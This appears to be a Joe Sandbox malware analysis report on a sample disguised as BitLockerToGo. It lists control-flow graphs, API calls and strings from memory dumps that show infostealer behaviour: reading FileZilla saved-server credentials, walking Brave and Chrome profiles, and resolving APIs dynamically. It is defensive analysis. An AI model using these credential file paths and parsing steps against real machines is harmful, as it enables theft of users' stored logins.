                                                                                                                                                      control_flow_graph 825 2760250-27602e2 call 276a740 call 2768de0 call 276a920 call 276a8a0 call 276a800 * 2 call 276a9b0 call 276a8a0 call 276a800 call 276a7a0 call 27599c0 847 27602e7-27602ec 825->847 848 2760726-2760739 call 276a800 call 2751550 847->848 849 27602f2-2760309 call 2768e30 847->849 849->848 854 276030f-276036f strtok_s call 276a740 * 4 GetProcessHeap RtlAllocateHeap 849->854 865 2760372-2760376 854->865 866 276037c-276038d StrStrA 865->866 867 276068a-2760721 lstrlen call 276a7a0 call 2751590 call 2765190 call 276a800 memset call 276aa40 * 4 call 276a800 * 4 865->867 869 27603c6-27603d7 StrStrA 866->869 870 276038f-27603c1 lstrlen call 27688e0 call 276a8a0 call 276a800 866->870 867->848 872 2760410-2760421 StrStrA 869->872 873 27603d9-276040b lstrlen call 27688e0 call 276a8a0 call 276a800 869->873 870->869 877 2760423-2760455 lstrlen call 27688e0 call 276a8a0 call 276a800 872->877 878 276045a-276046b StrStrA 872->878 873->872 877->878 880 2760471-27604c3 lstrlen call 27688e0 call 276a8a0 call 276a800 call 276aad0 call 2759ac0 878->880 881 27604f9-276050b call 276aad0 lstrlen 878->881 880->881 927 27604c5-27604f4 call 276a820 call 276a9b0 call 276a8a0 call 276a800 880->927 899 2760511-2760523 call 276aad0 lstrlen 881->899 900 276066f-2760685 strtok_s 881->900 899->900 912 2760529-276053b call 276aad0 lstrlen 899->912 900->865 912->900 921 2760541-2760553 call 276aad0 lstrlen 912->921 921->900 929 2760559-276066a lstrcat * 3 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 3 call 276aad0 lstrcat * 3 call 276aad0 lstrcat * 3 call 276a820 * 4 921->929 927->881 929->900
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027599EC
                                                                                                                                                        • Part of subcall function 027599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02759A11
                                                                                                                                                        • Part of subcall function 027599C0: LocalAlloc.KERNEL32(00000040,?), ref: 02759A31
                                                                                                                                                        • Part of subcall function 027599C0: ReadFile.KERNEL32(000000FF,?,00000000,027602E7,00000000), ref: 02759A5A
                                                                                                                                                        • Part of subcall function 027599C0: LocalFree.KERNEL32(027602E7), ref: 02759A90
                                                                                                                                                        • Part of subcall function 027599C0: CloseHandle.KERNEL32(000000FF), ref: 02759A9A
                                                                                                                                                        • Part of subcall function 02768E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02768E52
                                                                                                                                                      • strtok_s.MSVCRT ref: 0276031B
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,02770DBA,02770DB7,02770DB6,02770DB3), ref: 02760362
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02760369
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 02760385
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02760393
                                                                                                                                                        • Part of subcall function 027688E0: malloc.MSVCRT ref: 027688E8
                                                                                                                                                        • Part of subcall function 027688E0: strncpy.MSVCRT ref: 02768903
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 027603CF
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 027603DD
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 02760419
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02760427
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 02760463
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02760475
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02770DB2), ref: 02760502
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0276051A
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 02760532
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0276054A
                                                                                                                                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 02760562
                                                                                                                                                      • lstrcat.KERNEL32(?,profile: null), ref: 02760571
                                                                                                                                                      • lstrcat.KERNEL32(?,url: ), ref: 02760580
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02760593
                                                                                                                                                      • lstrcat.KERNEL32(?,02771678), ref: 027605A2
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 027605B5
                                                                                                                                                      • lstrcat.KERNEL32(?,0277167C), ref: 027605C4
                                                                                                                                                      • lstrcat.KERNEL32(?,login: ), ref: 027605D3
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 027605E6
                                                                                                                                                      • lstrcat.KERNEL32(?,02771688), ref: 027605F5
                                                                                                                                                      • lstrcat.KERNEL32(?,password: ), ref: 02760604
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02760617
                                                                                                                                                      • lstrcat.KERNEL32(?,02771698), ref: 02760626
                                                                                                                                                      • lstrcat.KERNEL32(?,0277169C), ref: 02760635
                                                                                                                                                      • strtok_s.MSVCRT ref: 02760679
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02770DB2), ref: 0276068E
                                                                                                                                                      • memset.MSVCRT ref: 027606DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                      • API String ID: 3689735781-555421843
                                                                                                                                                      • Opcode ID: 650fa9ef0236c35ba60debfdef7d45fead8956543f2c811761fc7418b025ca8a
                                                                                                                                                      • Instruction ID: 06900bea3ad47126664ff37c51be9639cbecdc6b281ba202e9afc0b3a8100a78
                                                                                                                                                      • Opcode Fuzzy Hash: 650fa9ef0236c35ba60debfdef7d45fead8956543f2c811761fc7418b025ca8a
                                                                                                                                                      • Instruction Fuzzy Hash: E4D11AB1D50209ABDB05EBE4DD9DEFE7779EF14710F504418E906B6080EE75AA0ACFA0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D32B0), ref: 027698A1
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D32C8), ref: 027698BA
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D32E0), ref: 027698D2
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D32F8), ref: 027698EA
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D3310), ref: 02769903
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D3328), ref: 0276991B
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D4328), ref: 02769933
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D4348), ref: 0276994C
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D3338), ref: 02769964
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D4368), ref: 0276997C
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D4380), ref: 02769995
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D04B0), ref: 027699AD
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D04C8), ref: 027699C5
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D7398), ref: 027699DE
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D7488), ref: 027699F6
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D04E8), ref: 02769A0E
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D7320), ref: 02769A27
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D73C8), ref: 02769A3F
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D0508), ref: 02769A57
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D7458), ref: 02769A70
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D0528), ref: 02769A88
                                                                                                                                                      • LoadLibraryA.KERNEL32(029D73B0,?,02766A00), ref: 02769A9A
                                                                                                                                                      • LoadLibraryA.KERNEL32(029D74B8,?,02766A00), ref: 02769AAB
                                                                                                                                                      • LoadLibraryA.KERNEL32(029D7350,?,02766A00), ref: 02769ABD
                                                                                                                                                      • LoadLibraryA.KERNEL32(029D7338,?,02766A00), ref: 02769ACF
                                                                                                                                                      • LoadLibraryA.KERNEL32(029D7368,?,02766A00), ref: 02769AE0
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029D73F8), ref: 02769B02
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029D7380), ref: 02769B23
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029D7410), ref: 02769B3B
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029D73E0), ref: 02769B5D
                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,029D0548), ref: 02769B7E
                                                                                                                                                      • GetProcAddress.KERNEL32(76E90000,029D0568), ref: 02769B9F
                                                                                                                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 02769BB6
                                                                                                                                                      Strings
                                                                                                                                                      • NtQueryInformationProcess, xrefs: 02769BAA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: NtQueryInformationProcess
                                                                                                                                                      • API String ID: 2238633743-2781105232
                                                                                                                                                      • Opcode ID: aa0dcfb157ab4813e89bd337b66d9f594d49a0c53c6e21a99b7843af70453602
                                                                                                                                                      • Instruction ID: 858882e61bd2774a12de095b88c50bea98ed3299f99db4454a70c84f98264371
                                                                                                                                                      • Opcode Fuzzy Hash: aa0dcfb157ab4813e89bd337b66d9f594d49a0c53c6e21a99b7843af70453602
                                                                                                                                                      • Instruction Fuzzy Hash: BAA19DB5D9C2009FD344EFAEE9A997637F9F75C3213184D1AA609C3214D73A9861CF90

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1814 275be70-275bf02 call 276a740 call 276a920 call 276a9b0 call 276a8a0 call 276a800 * 2 call 276a740 * 2 call 276aad0 FindFirstFileA 1833 275bf04-275bf3c call 276a800 * 6 call 2751550 1814->1833 1834 275bf41-275bf55 StrCmpCA 1814->1834 1879 275c80f-275c812 1833->1879 1835 275bf57-275bf6b StrCmpCA 1834->1835 1836 275bf6d 1834->1836 1835->1836 1838 275bf72-275bfeb call 276a820 call 276a920 call 276a9b0 * 2 call 276a8a0 call 276a800 * 3 1835->1838 1839 275c7b4-275c7c7 FindNextFileA 1836->1839 1884 275bff1-275c077 call 276a9b0 * 4 call 276a8a0 call 276a800 * 4 1838->1884 1885 275c07c-275c0fd call 276a9b0 * 4 call 276a8a0 call 276a800 * 4 1838->1885 1839->1834 1841 275c7cd-275c7da FindClose call 276a800 1839->1841 1847 275c7df-275c80a call 276a800 * 5 call 2751550 1841->1847 1847->1879 1920 275c102-275c118 call 276aad0 StrCmpCA 1884->1920 1885->1920 1924 275c2df-275c2f5 StrCmpCA 1920->1924 1925 275c11e-275c132 StrCmpCA 1920->1925 1927 275c2f7-275c33a call 2751590 call 276a7a0 * 3 call 275a260 1924->1927 1928 275c34a-275c360 StrCmpCA 1924->1928 1925->1924 1926 275c138-275c252 call 276a740 call 2768b60 call 276a9b0 call 276a920 call 276a8a0 call 276a800 * 3 call 276aad0 * 2 CopyFileA call 276a740 call 276a9b0 * 2 call 276a8a0 call 276a800 * 2 call 276a7a0 call 27599c0 1925->1926 2081 275c254-275c29c call 276a7a0 call 2751590 call 2765190 call 276a800 1926->2081 2082 275c2a1-275c2da call 276aad0 DeleteFileA call 276aa40 call 276aad0 call 276a800 * 2 1926->2082 1989 275c33f-275c345 1927->1989 1930 275c3d5-275c3ed call 276a7a0 call 2768d90 1928->1930 1931 275c362-275c379 call 276aad0 StrCmpCA 1928->1931 1955 275c4c6-275c4db StrCmpCA 1930->1955 1956 275c3f3-275c3fa 1930->1956 1944 275c3d0 1931->1944 1945 275c37b-275c3ca call 2751590 call 276a7a0 * 3 call 275a790 1931->1945 1947 275c73a-275c743 1944->1947 1945->1944 1952 275c745-275c799 call 2751590 call 276a7a0 * 2 call 276a740 call 275be70 1947->1952 1953 275c7a4-275c7af call 276aa40 * 2 1947->1953 2034 275c79e 1952->2034 1953->1839 1961 275c4e1-275c64a call 276a740 call 276a9b0 call 276a8a0 call 276a800 call 2768b60 call 276a920 call 276a8a0 call 276a800 * 2 call 276aad0 * 2 CopyFileA call 2751590 call 276a7a0 * 3 call 275aef0 call 2751590 call 276a7a0 * 3 call 275b4f0 call 276aad0 StrCmpCA 1955->1961 1962 275c6ce-275c6e3 StrCmpCA 1955->1962 1964 275c3fc-275c403 1956->1964 1965 275c469-275c4b6 call 2751590 call 276a7a0 call 276a740 call 276a7a0 call 275a790 1956->1965 2113 275c6a4-275c6bc call 276aad0 DeleteFileA call 276aa40 1961->2113 2114 275c64c-275c699 call 2751590 call 276a7a0 * 3 call 275ba80 1961->2114 1962->1947 1971 275c6e5-275c72f call 2751590 call 276a7a0 * 3 call 275b230 1962->1971 1975 275c405-275c461 call 2751590 call 276a7a0 call 276a740 call 276a7a0 call 275a790 1964->1975 1976 275c467 1964->1976 2037 275c4bb 1965->2037 2040 275c734 1971->2040 1975->1976 1984 275c4c1 1976->1984 1984->1947 1989->1947 2034->1953 2037->1984 2040->1947 2081->2082 2082->1924 2121 275c6c1-275c6cc call 276a800 2113->2121 2130 275c69e 2114->2130 2121->1947 2130->2113
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,02770B32,02770B2B,00000000,?,?,?,027713F4,02770B2A), ref: 0275BEF5
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027713F8), ref: 0275BF4D
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027713FC), ref: 0275BF63
                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0275C7BF
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0275C7D1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                      • API String ID: 3334442632-726946144
                                                                                                                                                      • Opcode ID: 97243fe644f92d47fb9b05d2ebd6302e5c6840ff68a7370c11f95b893a46ec3c
                                                                                                                                                      • Instruction ID: 8119ecada03df3470db9e6ff0f94b4f1da5c6db357c7ecd1d6e0b04743d132ee
                                                                                                                                                      • Opcode Fuzzy Hash: 97243fe644f92d47fb9b05d2ebd6302e5c6840ff68a7370c11f95b893a46ec3c
                                                                                                                                                      • Instruction Fuzzy Hash: F24243729101199BDB16FB70DD9DEFE737EAB54300F404568AD0AA6180EF349B49CFA1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2131 6c7f35a0-6c7f35be 2132 6c7f38e9-6c7f38fb call 6c82b320 2131->2132 2133 6c7f35c4-6c7f35ed InitializeCriticalSectionAndSpinCount getenv 2131->2133 2134 6c7f38fc-6c7f390c strcmp 2133->2134 2135 6c7f35f3-6c7f35f5 2133->2135 2134->2135 2139 6c7f3912-6c7f3922 strcmp 2134->2139 2137 6c7f35f8-6c7f3614 QueryPerformanceFrequency 2135->2137 2140 6c7f374f-6c7f3756 2137->2140 2141 6c7f361a-6c7f361c 2137->2141 2142 6c7f398a-6c7f398c 2139->2142 2143 6c7f3924-6c7f3932 2139->2143 2146 6c7f396e-6c7f3982 2140->2146 2147 6c7f375c-6c7f3768 2140->2147 2144 6c7f393d 2141->2144 2145 6c7f3622-6c7f364a _strnicmp 2141->2145 2142->2137 2143->2145 2148 6c7f3938 2143->2148 2149 6c7f3944-6c7f3957 _strnicmp 2144->2149 2145->2149 2150 6c7f3650-6c7f365e 2145->2150 2146->2142 2151 6c7f376a-6c7f37a1 QueryPerformanceCounter EnterCriticalSection 2147->2151 2148->2140 2149->2150 2152 6c7f395d-6c7f395f 2149->2152 2150->2152 2153 6c7f3664-6c7f36a9 GetSystemTimeAdjustment 2150->2153 2154 6c7f37b3-6c7f37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2151->2154 2155 6c7f37a3-6c7f37b1 2151->2155 2156 6c7f36af-6c7f3749 call 6c82c110 2153->2156 2157 6c7f3964 2153->2157 2158 6c7f37ed-6c7f37fa 2154->2158 2159 6c7f37fc-6c7f3839 LeaveCriticalSection 2154->2159 2155->2154 2156->2140 2157->2146 2158->2159 2160 6c7f383b-6c7f3840 2159->2160 2161 6c7f3846-6c7f38ac call 6c82c110 2159->2161 2160->2151 2160->2161 2166 6c7f38b2-6c7f38ca 2161->2166 2167 6c7f38dd-6c7f38e3 2166->2167 2168 6c7f38cc-6c7f38db 2166->2168 2167->2132 2168->2166 2168->2167
                                                                                                                                                      APIs
                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F3773
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F377E
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F37BD
                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C7F37C4
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C7F37CB
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C7F3801
                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C7F3883
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C7F3902
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C7F3918
                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C7F394C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
